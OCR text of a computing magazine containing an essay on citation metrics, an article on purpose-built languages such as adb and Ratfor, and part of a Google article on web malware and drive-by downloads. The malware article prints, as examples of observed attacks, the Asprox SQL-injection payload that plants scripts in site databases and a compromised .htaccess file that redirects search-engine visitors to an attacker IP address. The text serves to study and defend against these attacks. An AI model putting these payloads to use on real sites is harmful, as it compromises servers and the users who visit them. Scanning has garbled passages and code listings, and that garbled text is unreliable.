citation databases, especially the h- 
index, the highest such that C (n) > 
n, where C (n) is the citation count of 
the author’s n-th ranked publication. 
Variants exist: 

> The individual h-index divides the 
h-index by the number of authors, bet- 
ter reflecting individual contributions. 

> The g-index, highest nsuch that the 
top n publications received (together) 
at least n* citations, corrects another 
h-index deficiency: not recognizing 
extremely influential publications. (If 
your second most cited work has 100 
citations, the h-index does not care 
whether the first has 101 or 15,000.) 

The “Publish or Perish” site® com- 


e See http://www.harzing.com/resources.htm #/ 
pop.htm. 
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tortions. It would be as counterproduc- 
tive to reject these techniques as to use 
them blindly to get definitive research- 
er assessments. There is no substitute 


_ fora careful process involving comple- 


mentary sources such as peer review. 


Assessing Assessment 
Scientists are taught rigor: submit 


_ any hypothesis to scrutiny, any experi- 


ment to duplication, any theorem to 
independent proof. They naturally 
assume that processes affecting their 
careers will be subjected to similar 
standards. Just as they do not expect, 
in arguing with a Ph.D. student, to im- 
pose a scientifically flawed view on the 
sole basis of seniority, so will they not 
let management impose a flawed eval- 
uation mechanism on the sole basis of 
authority: 

10. Assessment criteria must them- 
selves undergo assessment and revision. 

Openness and_ self-improvement 
are the price to pay to ensure a success- 
ful process, endorsed by the commu- 
nity. This observation is representative 
of our more general conclusion. Nega- 
tive reactions to new assessment tech- 
niques deserve consideration. They 
are not rejections of assessment per 
se but calls for a professional, rational 


| approach. The bad news is that there is 


no easy formula; no tool will deliver a 
magic number defining the measure of 
a researcher. The good news is that we 
have ever more instruments at our dis- 
posal, which taken together can help 
form a truthful picture of CS research 
effectiveness. Their use should under- 
go the same scrutiny that we apply to 
our work as scientists. 
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The ecosystem of purpose-built languages 
is a key part of systems development. 


BY MIKE SHAPIRO 


Purpose-Built 
Languages 
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sprout like weeds alongside the road 
of mainstream language develop- 
ment, and they exhibit properties and 
a history that lead one to reconsider 
instinctive answers to the fundamen- 
tal language questions. Considering 
purpose-built languages, program- 
ming language development is not 
converging at all, and utility seems to 
have little to do with traditional no- 
tions of structure or properties that 
are empirically “better” from a lan- 
guage-design perspective. Purpose- 
built languages even defy a strict 
definition worthy of a prescriptive 
compiler grammarian: they somehow 
seem “smaller” than a full-fledged 
programming language; they are not 
always Turing-complete; they can 
lack formal grammars (and parsers); 
they are sometimes stand-alone but 
often a part of a more complex envi- 
ronment or containing program; they 
are often but not always interpreted; 
they are typically designed fora single 
purpose but often (accidentally) jump 
from one type of use to another. And 
some are even nameless. 

Most significantly, purpose-built 
languages have often formed an es- 
sential part of the development of 
larger software systems such as oper- 
ating systems, whether as a part of de- 
veloper tools or as glue between dis- 
tinct pieces of a larger environment. 
So it is particularly interesting to un- 
earth some of these lesser-known cre- 
ations and look at their connections 
to our larger language insights. In my 
career, while working on several com- 
mercial operating systems and large 
software components, I have come 
to conclude that not only are new 
languages developing all the time, 
but they are also often integral to the 
growth and maintenance of larger- 
scale software systems. 

The Unix environment, with its 
philosophy of little tools that can be 
easily connected, was an ideal green- 


| house for the growth of purpose-built 


languages. A cursory scan of Unix 
manuals from the early 1980s shows 
more than 20 little languages of vari- 


practice 


circa 1967. 


Figure 1: Little languages in Unix, early 1980s. Figure 2: ODT-8 debugger syntax, 


Debuggers Shells/Utilities Text Formatting 
adb sh eqn 
dbx csh pic 
stabs awk nroff, troff 
be, de 
ed, ex, Vi 
sed 
Programming Tools Games Libraries 
lex rogue, trek regex 
make 
m4 Configuration 
ratfor sendmail.cf 
yacc 


ous forms in active use, as shown in 
Figure 1. 

These languages vary from com- 
plete programming languages (sh) 
to preprocessors (yacc) to command- 
line syntax (adb) to representations 
of state machines or data struc- 
tures (regular expressions, debugger 
“stabs”). Twenty years later, when 


Sun Microsystems released the mod- | 
_ form of the first debugger for the new 
of the new significant operating-sys- | 


ern Unix system Solaris 10, almost all 


tem features involved the introduc- 
tion of new purpose-built languages: 
the DTrace debugging software in- 
troduced the D language for tracing 
queries; the Fault Management sys- 
tem included a language for describ- 
ing fault propagations; the Zones and 
Service Management features includ- 
ed XML configuration grammars and 
new command-line interpreters. 

The history of one of these little 
Unix languages, that of the adb de- 
bugger, is particularly illustrative of 
the accidental evolution and sticki- 
ness of something small but useful in 
a larger system. 


Evolution Trumps 

Intelligent Design 

The early development of Unix oc- 
curred on DEC PDP systems, which 
had a very simple debugger available 
known as ODT, or Octal Debugging 
Technique. (This terrific name con- 
jures thoughts of a secret kung fu 
maneuver used to render the PDP’s 
12-bit registers paralyzed.) The ODT 
program supported an_ incredibly 
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primitive syntax: an octal physical 


memory address was specified at the | 
start of each command and suffixed | 


with a single character (say, B for 
breakpoint) or a slash (/) to read and 
optionally to write the content of that 
memory location, as shown in Figure 
Die 

Thus, a little language was born. 
The ODT syntax clearly inspired the 


Unix system being developed on the 
PDP, which was simply called db. At 
the time of Unix v3 in 1971, the db 
command syntax borrowed the basic 


ODT model and began extending it | 
with additional character suffixes to | 


define addressing modes and format- 
ting options, as shown in Figure 3. 

By 1980, db had been replaced by 
adb, which was included with the 
AT&T SVR3 Unix distribution. The syn- 
tax had evolved to add new debugging 
commands over the intervening years 
and now supported not just simple 
addresses but arithmetic expressions 
(123+456 / was now legal). Also, a 
character after “/” now indicated a 
data format, and a character after “S” 
or “:” now indicated an action. The 
adb syntax is shown in Figure 4. 

The addition of “$<” to read an ex- 
ternal file of commands was particu- 
larly interesting, because it spawned 
the development of primitive adb 
programs or macros that executed 
a series of commands to display the 
contents of a C data structure at a 
particular memory address. That is, 
to display a kernel proc structure, you 
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400 / display the content 
of memory location 400 
400 / 6046 observe the value 


is 6046 at that location 


rewrite the value 
to 2345 


400 / 6046 2345 


3000B set a breakpoint at 3000 


ODT-8 Octal Debugging Technique Manual, 
DEC-D8-COCO-D, Dec. 1967 


Figure 3: Unix V3 “db” syntax, circa 1971 


address / Print a word in octal 
address \ Print a byte in octal 
address ~ Print a byte in ASCII 


address ? Disassemble an instruction 
$ Print the machine registers 


Unix Version 3 Manual Pages, DB(1), Nov. 3, 1971. 


Figure 4: AT&T SVR3 “adb” syntax, 
circa 1980. 


Print a two-byte integer in 

octal at the specified address 
Print a two-byte integer in 
hexadecimal at the specified 
address 

Print a two-byte integer in 
decimal at the specified 


expression /o 


expression /x 


expression /d 


address 
Sa Print an Algol stack backtrace 
Sc Print a C stack backtrace 
Sr Print the machine registers 


Set a breakpoint 
Read and execute the 
command found in 
the specified file 


expression :b 
$< filename 


Kernighan, B. Ratfor: A preprocessor for a Rational 
Fortran. Software—Practice and Experience. Oct. 1975. 


would take its address and then type 
“S<proc” to execute a predefined 
series of commands to display each 
memory of the C data structure for 
a process. The content of the proc 
macro in SunOS 4 from 1984 is shown 
in Figure 5. To make this output un- 
derstandable, the “/” command could 
now be suffixed with quoted string 
labels, newlines (n) and tabs (16t) to 
be included among the decoded data. 


The “.” variable evaluates to the in- 
put address used when applying the 
macro, and the “+” variable evaluates 
to that input address incremented by 
the byte count of all preceding format 
characters. The macros were then 
maintained with the kernel source 
code. 

More than a decade later, in 1997, 
I was working at Sun on what would 
become Solaris 7. This release was 
our first 64-bit kernel, but the kernel- 
debugging tool of choice was still adb 
just as it was in 1984, and our source 
base now contained hundreds of use- 
ful macro files. Unfortunately, the im- 


plementation of adb was essentially | 


impossible to port cleanly from 32-bit 
to 64-bit to debug the new kernel, so 
it seemed the time was ripe for the de- 
velopment of a new clean code base 
with many more modern debugger 
features. 

As I considered how best to ap- 
proach the problem, I was struck by 
the fact that despite its brittle, un- 
structured code base, the key feature 
of adb was that its syntax was imbued 
deeply in the minds and behaviors of 
all of our most experienced and effec- 
tive engineers. (As someone aptly put 
it at the time: “It’s in the fingers.”) Sol 
set out to build a new modular debug- 
ger (mdb) that would support an API 
for advanced kernel debugging and 
other modern features, yet would re- 
main precisely backward-compatible 
with existing syntax and macros. So- 
phisticated new features were added 
after a new prefix (“::”) so they would 
not break the existing syntax (for ex- 
ample, “::findleaks” to check for 
kernel memory leaks). The entire syn- 
tax was at last properly encoded as a 
yacc parser. Macro files were phased 
out in favor of compiler-generated de- 
bug information, but the “$<” syntax 
was left as an alias. Another decade 
later, mdb remains the standard tool 
for postmortem debugging of the 
OpenSolaris kernel and has been ex- 
tended by hundreds of programmers. 

The debugger tale illustrates that 
a little purpose-built language can 
evolve essentially at random, have no 
clear design, no consistent grammar 
or parser, and no name, and yet en- 
dure and grow in shipping operating 
systems for more than 40 years. In the 
same time period, many mainstream 


address $<proc 

./" link" 16t"rlink’16t"nxt”"16t"”prev’nXXXX 
+/"as"16t"segu”16t"stack” 16t”uarea”nXXXX 
+/"apri” 


Figure 5: Debugging the “proc” structure on SunOS 4, circa 1984. 


practice 


+/"upri”’8t”pri”st”cpu”8t”stat”8t” time” 8t”"nice”nbbbbbb 


+/"slp"8t"cursig’16t”sig”bbX 
+/"mask”16t” ignore” 16t"catch”’nXXX 
+/"f£lag”16t"uid" 8t”suid”8t”pgrp”"nxddd 
+/"pid”8t”ppid”8t”xstat”8t”ticks”nddxd 
+/"cred”"16t"ru"16t"tsize”’nXxXX 
+/"dsize"16t"ssize”16t"rssize”’nXXX 
+/"Maxrss"16t"swrss"16t"wchan”"nXXX 
+/16+"Scpu" 16t"pptr”16t"tptr”nXXX 
+/"real itimer”n4D 

+/"idhash” 16t”swlocks”ndd 


+/"aio forw’16t”aio back”8t”aio count”8t”threadcnt”nXxxX 


Figure 6: Fortran and Ratfor, circa 1975. 


if (a .gt. b) goto 10 bing 
sw = 0 
write(6, 1) a, b 
goto 20 
10 sw=1 
write(6, 1) b, a 
20 


write(6, 1) a, b 


write(6, 1) b, a 


Figure 7: C and Algol mutant from early “adb”. 


#define 
#define 
#define 
#define 
#define 


IF if( 

THEN ){ 

ELSE } else { 
Er | 

ANDF && 


localsym(cframe) 
L_ INT cframe; 


{ 


INT symflg; 
WHILE nextsym() ANDF localok 
ANDF symbol.symc[0]!=’~’ 


ANDF (symflg=symbol.symf£) !=037 


DO IF symflg>=2 ANDF symflg<=4 


THEN localval=symbol.symv; 


return (TRUE); 
ELIF symflg== 
THEN 
return(TRUE); 
ELIF 
THEN 
return(TRUE); 
FI 
OD 


return (FALSE) ; 


languages came and went into the 
great beyond (Algol, Ada, Pascal, Co- 
bol, and so on). Fundamentally, this 
debugger has survived for one reason: 
it concisely encoded the exact task its 
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localval=leng(shorten(cframe)+symbol.symv) ; 


symflg==20 ANDF lastframe 
localval=leng(lastframe+2*symbol.symv-10) ; 


users performed and thereby connect- 
ed to those users. Take an address, 
dump out its content, find the next 
address, follow it to the next location 
of interest, dump out its content, and 
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so on. For purpose-built languages, 
a deep connection to a task and the 
user community for that task is often 
worth more than clever design or el- 
egant syntax. 


Mutation and Hybridization 

Mutation, some accidental and some 
intentional, often plays a critical role 
in the development of purpose-built 
systems languages. One common 
form of mutation involves adding a 
subset of the syntax of one language 
(for example, expressions or regular 
expressions) to another language. 
This type of mutation can be imple- 
mented using a preprocessor that 
converts one high-level form to an- 
other or intermingles preprocessed 
syntax with the target syntax of a des- 
tination language. Mutations may 
diverge far enough that a new hybrid 
language is formed. The parser tools 
yacc and bison are the most well- 
known examples of a complete hybrid 
language: a grammar is declared as a 
set of parsing rules intermingled with 


C code that is executed in response to | 


the rules; the utilities then emit a fin- 
ished C program that includes the rule 
code and the code to execute a parsing 
state-machine on the grammar. 
Another example of this type of 
mutation in early Unix was the Ratfor 
(Rational Fortran) preprocessor devel- 
oped by Kernighan. Ratfor permitted 
the author to write Fortran code with 
C expressions and logical blocks, and 
the result was translated into Fortran 


syntax with line numbers and goto | 


statements, as shown in Figure 6. 

An even stranger mutant language 
was a hybrid of C and Algol syntax de- 
veloped using the C preprocessor and 
used in the code for, what else, adb. 


Apparently, Steve Bourne, the author | 


of the Algol-like Unix sh syntax, was de- 
termined that some of Algol’s genome 


would carry on in the species. Some | 


sample code is shown in Figure 7. 
Alas, a later version of the code was 


run through the preprocessor and | 


then checked in so as to ease main- 
tenance. Many future languages have 
included more clearly designed cross- 
breeding to ease the transition from 
one environment to another. Follow- 
ing the widespread adoption of C, its 
expression syntax found its way into 
an incredible number of new lan- 
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Take an address, 
dump out its 
content, find the 
next address, 
follow it to the next 
location of interest, 
dump out its 
content, and so on. 
For purpose-built 
languages, a deep 
connection to a task 
is often worth more 
than clever design 
or elegant syntax. 
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guages, little and big, including Awk, 
C++, Java, JavaScript, D, Ruby, and 
many others. Similarly, following the 
success of Perl, many other scripting 
languages adopted its useful exten- 
sions to regular expression syntax as 
a new canonical form. Core concepts 
such as expression syntax often form 
the bulk of a small language, and bor- 
rowing from a well-established model 


| permits rapid language implementa- 


tion and rapid adoption by users. 


| Symbiosis 


In the development of a larger soft- 
ware system, little languages often 
live in symbiotic partnership with the 


| mainstream development language 


or with the software system itself. The 
adb macro language described earlier 
would likely not have survived outside 
of the source-code base of its Unix 
parent. The macro language of your 
favorite spreadsheet is another exam- 
ple: it exists to provide a convenient 
way to manipulate the user-visible ab- 
stractions of the containing software 
application. 

In the operating-system world, 
my favorite little-known example of 
symbiosis is the union of Forth and 
SPARC assembly language created at 
Sun as part of the work on the Open- 
Boot firmware. The idea was to create 
a small interpreter used as the boot 
environment on SPARC workstations. 


| Forth was chosen for the boot and 


hardware bring-up environment for 
new hardware because the language 
kernel was tiny and could be brought 
up immediately on a new processor 
and platform. Then, using the Forth 
dictionaries, new commands could 
be defined on the fly in the interpreter 
for debugging. Since Forth permits its 
dictionaries to override the definition 
of words (tokens) in the interpreter, 
someone developed the creative idea 
of using the interpreter as a macro 
assembler for the hardware. A set of 
dictionaries was created that rede- 
fined each of the opcodes in SPARC 
(“Id,” “move,” “add,” and so on) with 
Forth code that would compute the 
binary representation of the assem- 
bled instructions and store them into 


' memory. Therefore, entire low-level 


functions could be written in what 
appeared to be assembly language, 
prefixed with Forth headers, and 


typed into the tiny interpreter, which 
would then assemble the object code 
in memory as it parsed the tokens and 
executed the resulting routine. 

In recent years, Web browsers have 
become fertile ground for mutation 
and symbiosis. Two central figures in 
modern Web development are inter- 
preted JavaScript and XML. (XML it- 
self is the syntax for a variety of other 
languages and an abundant source of 
hybrid languages and mutations.) In 
the common Ajax programming mod- 
el, JavaScript objects can be serialized 
to XML form, and XML encodings can 
be used to pass remote procedure 
calls back to a server. In one such en- 
coding, XML-RPC, a standard exten- 
sion called multicall is provided for 
the browser client to issue multiple 
procedure calls from the client to the 
server in a single transfer. An exam- 
ple of a single call to a method x.foo 
and then a series of calls to the same 
method using multicall is shown in 
Figure 8. 

While implementing Ajax user- 
interface code for a new line of stor- 
age products, the Sun Fishworks team 
wanted to develop a way to minimize 
unnecessary client-server interac- 
tions. The first concept developed was 
the notion ofamulticall invocation 
whose parameter was the result of an- 
other call. In the following example, 
the method x.foo is called on the 
result of x.bar in a single XML-RPC 
interaction as shown in Figure 9. 

The trick here is that the new struc- 
ture member methodParams indi- 
cates that the next members are not 
static parameters but more methods 
to be called recursively, with the result 
pushed onto a stack. Once a stack had 
been born, it was only natural to start 
throwing in operators from a stack- 
based language, forming an entirely 
new interpreted language that itself 
is declared as data in JavaScript, sent 
to the server by the existing XML-RPC 
serialization, and executed by exten- 
sions to our XML-RPC interpreter 
engine. A few of the operators that 
we implemented at Sun are shown in 


Figure 10. 
This example illustrates that the 
symbiotic relationship between 


JavaScript and XML essentially al- 
lows our language to exist without 
requiring its own lexer or parser, and 


Figure 8: JavaScript, XML-RPC, and Multicall. 


x.foo({ bar: 123, baz: 456 }); 


system.multicall( 
{ methodName: 'x.foo’, 


practice 


params: [ { bar: 123, baz: 456 } ] }, 
{ methodName: ‘x.foo’, 

params: [ { bar: 789, baz: 654 } J }, 
{ methodName: ‘x.foo’, 

params: [ { bar: 222, baz: 333 } ] } 


Figure 9: Multicall with parameterized results. 


system.multicall( 


{ methodName: ‘x.foo’, methodParams: [ 
methodName: ‘x.bar’, params: [ 1, 2, 3 ] 
is, 


ie 


Figure 10: Multicall with stack operators. 


system.multicall( 


{ foreach: [ [ 2, 4, 6], [ 


{ methodName: ‘x.foo’, params: [] }, 


{ push: [] }, 
{ aivs (L { pop: Wy 2 1} 
ieee 


fundamentally serves the purpose of | 
offloading performance-critical code 
from JavaScript to our server and min- 
imizing round-trips. In the videogame 
industry, a similar symbiosis (without 
the hybrid syntax) has developed be- | 
tween Lua and C/C++. The Lua script- | 
ing language provides a popular form 
for writing non-performance-critical 
code in videogame engines, and the 
Lua interpreter design makes it easy 
to bridge to C code. 

Once two or more languages are 
interacting in a large software sys- | 
tem, it becomes only natural for an 
ecosystem of tools (likely incorpo- 
rating little languages with hybrid 
syntax) to spring up around them to | 
ease the maintenance, development, | 
and debugging of the entire system. 
If a rich ecosystem grows around the 
languages of a complete software sys- | 
tem, both little and big, purpose-built 
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and general-purpose, the longer the 
overall environment will thrive and its 
constituents survive. Therefore, as we 
build our towers of software abstrac- 
tion ever higher, we should expect to 
see and know more languages, not 
fewer. 
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Not only did they change their tactics, 
but also their motivation. Previously, 
large-scale events such as network 
worms were mostly exhibitions of tech- 
nical superiority. Today, adversaries 
are primarily motivated by economic 
incentives to not only exploit and seize 
control of compromised systems for as 


| long as possible but to turn their assets 


into revenue. 

The Web offers adversaries a pow- 
erful infrastructure to compromise 
computer systems and monetize the 
resulting computing resources as well 
as any information that can be stolen 
from them. Adversaries achieve this by 
employing the Web to serve malicious 
Web content capable of compromising 
users’ computers and running arbitrary 
code on them. This has largely been 
enabled due to the increased complex- 
ity of Web browsers and the resulting 
vulnerabilities that come with complex 
software. For example, a modern Web 
browser provides a powerful comput- 
ing platform with access to different 
scripting languages, (for example, 
Javascript) as well as external plugins 
that may not follow the same security 
policies applied by the browser (for ex- 
ample, Flash, Java). While these capa- 
bilities enable sophisticated Web ap- 
plications, they also allow adversaries 
to collect information about the target 
system and deliver exploits specifically 
tailored to a user’s computer. Web at- 
tacks render perimeter defenses that 
disallow incoming connections use- 
less against exploitation as adversaries 
use the browser to initiate out-bound 
connections to download attack pay- 
loads. This type of traffic looks almost 
identical to the users’ normal brows- 
ing traffic and is not usually blocked by 
network firewalls. 

To prevent Web-based malware 
from infecting users, Google has de- 
veloped an infrastructure to identify 
malicious Web pages. The data result- 
ing from this infrastructure is used to 
secure Web search results as well as 
protect browsers such as Firefox and 


| Chrome. In this article, we discuss in- 
| teresting Web attack trends as well as 
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some of the open challenges associ- 
ated with this rising threat. 


Web Attacks 

As Web browsers have become more 
capable and the Web richer in features, 
it is difficult for the average user to un- 
derstand what happens when visiting a 
Web page. In most applications visiting 
a Web page causes the browser to pull 
content from a number of different 
providers, for example, to show third- 
party ads, interactive maps, or display 
online videos. The shear number of 
possibilities to design Web pages and 


make them attractive to users is stag- | 


gering. Overall, these features increase 
the complexity of the components that 
constitute a modern Web browser. Un- 
fortunately, each browser component 
may introduce new vulnerabilities an 
adversary can leverage to gain control 
over a user’s computer. Over the past 
few years we have seen an increasing 
number of browser vulnerabilities,*® 
some of which have not had official 
fixes for weeks. 

For an adversary to exploit a vulner- 
ability, it requires the user visit a Web 
page that contains malicious content. 
One way to attract user traffic is to send 
spam email messages that advertise 
links to malicious Web pages. Howev- 
er, this delivery mechanism has some 
drawbacks. For the exploit to be de- 
livered, the user must open the spam 
email and then click on the embedded 
link. The ubiquitous Web infrastruc- 
ture provides a better solution to this 
bottleneck. While it is easy to exploit a 
Web browser, it is even easier to exploit 
Web servers. The relative simplicity of 
setting up and deploying Web servers 
has resulted in a large number of Web 
applications with remotely exploitable 
vulnerabilities. Unfortunately, these 
vulnerabilities are rarely patched, and 
therefore, remote exploitation of Web 
servers is increasing. To exploit users, 


adversaries just need to compromise | 


a Web server and inject malicious 
content, for example, via an IFRAME 
pointing to an exploit server. Any visi- 


tor to such a compromised Web server | 


becomes a target of exploitation. If the 
visitor’s system is vulnerable, the ex- 
ploit causes the browser to download 
and execute arbitrary payloads. We call 
this process “drive-by download.” De- 
pending on the popularity of the com- 
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Many drive-by 
downloads can 

be detected 
automatically via 
client honeypots. 
However, when 
adversaries use 
social engineering 
to trick the users 
into installing 
malicious software, 
automated 
detection is 
significantly 
complicated. 
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promised Web site, an adversary may 
get access to a large user population. 
Last year, Web sites with millions of 
visitors were compromised that way. 
Taking Over Web Servers. Turning 
Web servers into infection vectors is 
unfortunately fairly straightforward. 
Over the last couple years, we have ob- 
served a number of different attacks 
against Web servers and Web applica- 
tions, ranging from simple password 
guessing to more advanced attacks that 
can infect thousands of servers at once. 
In general, these attacks aim at alter- 
ing Web site content to redirect visitors 
to servers controlled by the adversary. 


_ Here, we expand on some examples of 


recent dominant server attacks. 

SQL Injection Attacks. SQL injection 
is an exploitation technique commonly 
used against Web servers that run vul- 
nerable database applications. The vul- 
nerability happens when user input is 
not properly sanitized (for example, by 
filtering escape characters and string 
literals) therefore causing well crafted 
user input to be interpreted as code and 
executed on the server. SQL injection 
has been commonly used to perpetrate 
unauthorized operations on a vulner- 
able database server such as harvesting 
users’ information and manipulating 
the contents of the database. In Web 
applications running a SQL database to 
manage users’ authentication, adver- 
saries use SQL injection to bypass login 
and gain unauthorized access to user 
accounts or, even worse, to gain admin- 
istrative access to the Web application. 
Other variants of these attacks allow the 
adversary to directly alter the contents 
of the server’s database and inject the 
adversary’s own content. 

Last year, a major SQL injection at- 
tack was launched by the Asprox bot- 
net.'* In this attack several thousand 
bots were equipped with an SQL injec- 
tion kit that starts by sending specially 
crafted queries to Google searching 
for servers that run ASP.net, and then 
launches SQL injection attacks against 
the Web sites returned from those 
queries. In these attacks the bot sends 


_ an encoded SQL query containing the 


exploit payload (similar to the format 
shown here) to the target Web server. 
Atte: 77www.victim-site.com/asp ap- 
plication asp?arg=<encoded sql query> 
The vulnerable server decodes and 
executes the query payload which, in the 


Asprox case, yields SQL code similar to 
the snippet shown in Figure 1. The de- 
coded payload searches the Web server 
folders for unicode and ASCII files and 
injects an IFRAME or a script tag in 
them. The injected content redirects the 
Web site users to Web servers controlled 
by the adversary and therefore subjects 
them to direct exploitation. 

We monitored the Asprox botnet 
over the past eight months, and ob- 
served bots getting instructions to re- 
fresh their lists of the domains to in- 
ject. Overall, we have seen 340 different 
injected domains. Our analysis of the 
successful injections revealed that ap- 
proximately six million URLs belonging 
to 153,000 different Web sites were vic- 
tims of SQL injection attacks by the As- 
prox botnet. While the Asprox botnet is 
no longer active, several victim sites are 
still redirecting users to the malicious 
domains. Because bots inject code in 
a non-coordinated manner, many Web 
sites end up getting multiple injections 
of malicious scripts over time. 

Redirections via .htaccess. Even 
when the Web pages on a server are 
harmless and unmodified, a Web servy- 
er may still direct users to malicious 
content. Recently, adversaries compro- 
mised Apache-based Web servers and 
altered the configuration rules in the 
. htaccess file. This configuration file 
can be used for access control, but also 
allows for selective redirection of URLs 
to other destinations. In our analysis 
of Web servers, we have found several 
incidents where adversaries installed 
.htaccess configuration files to re- 
direct visitors to malware distribution 
sites, for example, to fake anti-virus 
sites as we discuss later. 

One interesting aspect of .htac- 
cess redirections is the attempt to hide 
the compromise from the site owner. 
For example, redirection can be condi- 
tional based on how a visitor reached 
the compromised Web server as deter- 
mined by the HTTP Referer header of 
the incoming request. In the incidents 
we observed, the . htaccess rules were 
configured so that visitors arriving via 
search engines were redirected to a mal- 
ware site. However, when the site owner 
typed the URL directly into the browser’s 
location bar, the site would load normal- 
ly as the Referer header was not set. 

Figure 2 shows an example of a com- 
promised .htaccess file. In this ex- 


_ credentials will not solve the problem. 
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Figure 1. A decoded snippet of the SQL injection query sent by Asprox bots.” 


DECLARE @T VARCHAR(255),@C VARCHAR(255) 


DECLARE Table _Cursor CURSOR FOR SELECT a.name,b.name 


FROM sysobjects a,syscolumns b 

WHERE a.id=b.id AND a.xtype=’u’ 

AND (b.xtype=99 OR b.xtype=35 

OR b.xtype=231 OR b.xtype=167) 

OPEN Table Cursor FETCH NEXT FROM Table 
WHILE(@@FETCH _ STATUS=0) 

BEGIN EXEC(‘UPDATE [‘+@T+’] 


_ Cursor INTO @T,@C 


SET [‘+@C+’]=RTRIM(CONVERT (VARCHAR (4000), [‘+@C+']))+/'""") 


FETCH NEXT FROM Table Cursor INTO @T,@C 
END CLOSE Table Cursor 
DEALLOCATE Table _ Cursor 


ample, users visiting the compromised 
site via any of the listed search engines 
will be redirected to http://89.28.13.204/ | 
in.html?s=xx. Notice that the initial re- 
direct is usually to an IP address that 
acts as a staging server and redirects | 
users to a continuously changing set of 
domains. The staging server manages 
which users get redirected where. For 
example, the staging server may check 
whether the user has already visited the 
redirector and return an empty payload 
on any subsequent visit. We assume this 
is meant to make analysis and repro- 
duction of the redirection chain more | 
difficult. Adversaries also frequently | 
rewrite the . htaccess file to point to 
different IP addresses. Removing the 
. htaccess without patching the origi- 
nal vulnerability or changing the server 


Many Web masters attempted to delete 
the .htaccess and found a new one 
on their servers the next day. 

Taking Over Web Users. Once the ad- 


versaries have turned a Web server into 
an infection vector, visitors to that site 
are subjected to various exploitation at- 
tempts. In general, client exploits fall 
under two main categories: automated 
drive-by downloads and social engi- 
neering attacks. 


RewriteEngine On 

RewriteCond %{HTTP _ REFERER} 
RewriteCond %{HTTP _ REFERER} 
RewriteCond %{HTTP _ REFERER} 
RewriteCond %{HTTP _ REFERER} 
RewriteCond %{HTTP _ REFERER} 
RewriteCond %{HTTP _ REFERER} 
RewriteRule 


-*google.*$ 


-*yahoo.*$ 
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Figure 2. A snippet from the .htacsess file of a compromised Apache server." 
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Drive-by downloads. In this category, 
adversaries attempt to exploit flaws in 
either the browser, the operating sys- 
tem, or the browser’s external plugins. 


| A successful exploit causes malware to 


be delivered and executed on the user’s 
machine without her knowledge or con- 
cent. For example, a popular exploit 
we encountered takes advantage of a 
vulnerability in Microsoft Data Access 
Components (MDACS) that allows ar- 
bitrary code execution on a user’s com- 
puter.’ A 20-line Javascript code snippet 
was enough to exploit this vulnerability 
and initiate a drive-by download. 

Another popular exploit is due 
to a vulnerability in Microsoft Win- 
dows WebViewFolderIcon. The exploit 
Javascript uses a technique called heap 
spraying that creates a large number of 
Javascript string objects on the heap. 
Each Javascript string contains x86 
machine code (shellcode) necessary to 
download and execute a binary on the 
exploited system. By spraying the heap, 
an adversary attempts to create a copy 
of the shellcode at a known location in 
memory and then redirects program 
execution to it. 

Social engineering attacks. When drive- 
by downloads fail to compromise a user’s 
machine, adversaries often employ social 


{NC,OR] 
-*aol.*$ [NC,OR] 
.*msn.*$ [NC,OR] 
-*altavista.*$ [NC,OR] 
-*ask.*$ [NC,OR] 

[NC] 

.* http://89.28.13.204/in.html?s=xx [R,L] 
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engineering techniques to trick users 


themselves. Unfortunately, the Web is 
rich with deceptive content that lures 
users into downloading malware. 

One common class of attacks in- 
cludes images that resemble popular 
video players, along with a false warning 
that the computer is missing essential 
codecs for displaying the video, or that a 
newer version of the video player plugin 
is required to view it. Instead, the pro- 
vided link is for downloading a trojan 
that, once installed, gives the adversary 
full control over the user’s machine. 

A more recent trick involves fake 
security scans. A specially crafted Web 
site displays fake virus scanning dia- 
logs, along with animated progress 
bars and a list of infections presumably 
found on the computer. All the warn- 
ings are false and are meant to scare 
the user into believing their machine 
is infected. The Web site then offers a 
download as solution, which could be 
another trojan, or ask the user fora reg- 
istration fee to perform an unnecessary 
clean-up of their machine. 


We have observed a steady increase | 


in fake anti-virus attacks: From July to 
October 2008, we measured an average 
of 60 different domains serving fake se- 
curity products, infecting an average of 
1,500 Web sites. In November and De- 
cember 2008, the number of domains 
increased to 475, infecting over 85,000 
URLs. At that time the Federal Trade 
Commission reported that more than 


one million consumers were tricked | 


into buying these products, and a U.S. | 


district court issued a halt and an asset 
freeze on some of the companies behind 
these fake products.’ This does not ap- 
pear to have been sufficient to stop the 
scheme. In January 2009, we observed 
over 450 different domains serving fake 
security products, and the number of in- 
fected URLs had increased to 148,000. 
Malware activities on the user’s ma- 
chine. Whether a user was compro- 
mised by a social engineering attack or 
a successful exploit and drive-by down- 
load, once the adversaries have control 


over a user’s machine, they usually at- | 


tempt to turn their work into profit. 

In prior work,'° we analyzed the be- 
havior of Web malware installed by 
drive-by downloads. In many cases, mal- 
ware was equipped with key-loggers to 
spy on the user’s activity. Often, a back 
46 
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sary to access the machine directly at a 
later point in time. More sophisticated 


malware turned the machine into a bot | 


listening to remote commands and ex- 
ecuting various tasks on demand. For 
example, common uses of botnets in- 
clude sending spam email or harvest- 
ing passwords or credit cards. Botnets 
afford the adversary a degree of ano- 
nymity since spam email appears to be 
sent from a set of continuously chang- 
ing IP addresses making it harder to 
blacklist them. 


To help improve the safety of the | 


Internet, we have developed an exten- 
sive infrastructure for identifying URLs 
that trigger drive-by downloads. Our 
analysis starts by inspecting pages in 
Google’s large Web repository. While 
exhaustive inspection of each page is 


prohibitively expensive as the reposi- | 


tory contains billions of pages, we have 
developed a lightweight system to 
identify candidate pages more likely to 
be malicious. The candidate pages are 
then subjected to more detailed analy- 
sis in a virtual machine allowing us to 
determine if visiting a page results in 
malicious changes to the machine it- 


self. The lightweight analysis uses a | 


machine-learning framework that can 
detect 90% of all malicious pages with 
a false positive rate of only 10°. At this 
false positive rate, the filter reduces the 
workload of the virtual machines from 
billions of pages to only millions. The 
URLs that are determined to be mali- 
cious are further processed into host- 
suffix path-prefix patterns. Since 2006, 
our system has been used to protect 


Google’s search. Our data is also pub- | 


lished via Google’s Safe Browsing API 
to browsers such a Firefox, Chrome, 
and Safari. These browsers employ 
our data to prevent users from visiting 
harmful pages. 


Challenges 

Despite our efforts to make the Web 
safer for users, there are still a number 
of fundamental challenges requiring 


| future work, including: 


Securing Web Services. Establishing 
a presence on the Web, ranging from 
simple HTML pages to advanced Web 
applications, has become an easy pro- 
cess that enables even people with little 
technical knowledge to set up a Web 
service. However, maintaining such 
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| door was installed, allowing the adver- | a service and keeping it secure is still 
into installing and running malware by | 


difficult. Many Web application frame- 
works require programmers to follow 
strict security practices, such as sani- 
tizing and escaping user input. Unfor- 
